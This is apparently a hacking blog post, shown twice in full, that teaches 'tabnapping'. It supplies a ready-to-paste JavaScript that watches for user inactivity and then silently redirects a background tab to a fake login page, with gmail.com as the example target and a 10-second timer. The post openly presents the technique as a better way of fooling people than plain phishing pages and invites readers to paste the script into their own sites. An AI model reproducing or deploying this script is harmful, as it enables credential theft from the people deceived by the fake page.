People who are aware of phishing, might also know that looking into your
Address Bar URL, it can be easily figured out whether the page is
genuine or not, what i mean to say is practically now a days phishing
can be caught easily if the person whom you are fooling is technically
sound.
So a new way to work with fake login pages is by making use of tabnapping, which makes your chance of fooling the person more as compared to directly by using phishing pages.
Tabnapping: For tabnapping there comes a javascript, whose function is to redirect the page in which it is included to a different page, i.e your phishing page after a specific amount of time.
For eg: Include the tabnapping script to any page of your website and wait for the timer that is set in your script to redirect your original page to your fake page or genuine, whatever fits for you the best.
It is a common habit that when you work in a browser like mozilla or chrome etc you browse through different tabs while you are working, i.e meanwhile you open your page which contains the javascript, you browse through different tabs and while you are busy in working in different tabs your page gets redirected to fake page after the time you have specified which can be anything such as 10 sec or 5 sec or 5 mins depending upon you.
Lets see how it works !
<script type="text/javascript">
var xScroll, yScroll, timerPoll, timerRedirect, timerClock;
function initRedirect(){
if (typeof document.body.scrollTop != "undefined"){ //IE,NS7,Moz
xScroll = document.body.scrollLeft;
yScroll = document.body.scrollTop;
clearInterval(timerPoll); //stop polling scroll move
clearInterval(timerRedirect); //stop timed redirect
timerPoll = setInterval("pollActivity()",1); //poll scrolling
timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect
}
else if (typeof window.pageYOffset != "undefined"){ //other browsers that support pageYOffset/pageXOffset instead
xScroll = window.pageXOffset;
yScroll = window.pageYOffset;
clearInterval(timerPoll); //stop polling scroll move
clearInterval(timerRedirect); //stop timed redirect
timerPoll = setInterval("pollActivity()",1); //poll scrolling
timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect
}
//else do nothing
}
function pollActivity(){
if ((typeof document.body.scrollTop != "undefined" && (xScroll!=document.body.scrollLeft || yScroll!=document.body.scrollTop)) //IE/NS7/Moz
||
(typeof window.pageYOffset != "undefined" && (xScroll!=window.pageXOffset || yScroll!=window.pageYOffset))) { //other browsers
initRedirect(); //reset polling scroll position
}
}
document.onmousemove=initRedirect;
document.onclick=initRedirect;
document.onkeydown=initRedirect;
window.onload=initRedirect;
window.onresize=initRedirect;
</script>
In the above script you can see the website to whom you are redirected i.e. www.gmail.com and the time is 10 seconds . All you need to do is to copy and paste the script in your web page whom you want to redirect it to a fake page and see if it works.
Contact => www.facebook.com/ryan.manjothi
So a new way to work with fake login pages is by making use of tabnapping, which makes your chance of fooling the person more as compared to directly by using phishing pages.
Tabnapping: For tabnapping there comes a javascript, whose function is to redirect the page in which it is included to a different page, i.e your phishing page after a specific amount of time.
For eg: Include the tabnapping script to any page of your website and wait for the timer that is set in your script to redirect your original page to your fake page or genuine, whatever fits for you the best.
It is a common habit that when you work in a browser like mozilla or chrome etc you browse through different tabs while you are working, i.e meanwhile you open your page which contains the javascript, you browse through different tabs and while you are busy in working in different tabs your page gets redirected to fake page after the time you have specified which can be anything such as 10 sec or 5 sec or 5 mins depending upon you.
Lets see how it works !
<script type="text/javascript">
var xScroll, yScroll, timerPoll, timerRedirect, timerClock;
function initRedirect(){
if (typeof document.body.scrollTop != "undefined"){ //IE,NS7,Moz
xScroll = document.body.scrollLeft;
yScroll = document.body.scrollTop;
clearInterval(timerPoll); //stop polling scroll move
clearInterval(timerRedirect); //stop timed redirect
timerPoll = setInterval("pollActivity()",1); //poll scrolling
timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect
}
else if (typeof window.pageYOffset != "undefined"){ //other browsers that support pageYOffset/pageXOffset instead
xScroll = window.pageXOffset;
yScroll = window.pageYOffset;
clearInterval(timerPoll); //stop polling scroll move
clearInterval(timerRedirect); //stop timed redirect
timerPoll = setInterval("pollActivity()",1); //poll scrolling
timerRedirect = setInterval("location.href='http://www.gmail.com'",10000); //set timed redirect
}
//else do nothing
}
function pollActivity(){
if ((typeof document.body.scrollTop != "undefined" && (xScroll!=document.body.scrollLeft || yScroll!=document.body.scrollTop)) //IE/NS7/Moz
||
(typeof window.pageYOffset != "undefined" && (xScroll!=window.pageXOffset || yScroll!=window.pageYOffset))) { //other browsers
initRedirect(); //reset polling scroll position
}
}
document.onmousemove=initRedirect;
document.onclick=initRedirect;
document.onkeydown=initRedirect;
window.onload=initRedirect;
window.onresize=initRedirect;
</script>
In the above script you can see the website to whom you are redirected i.e. www.gmail.com and the time is 10 seconds . All you need to do is to copy and paste the script in your web page whom you want to redirect it to a fake page and see if it works.
Contact => www.facebook.com/ryan.manjothi
Posts
0 comments:
Post a Comment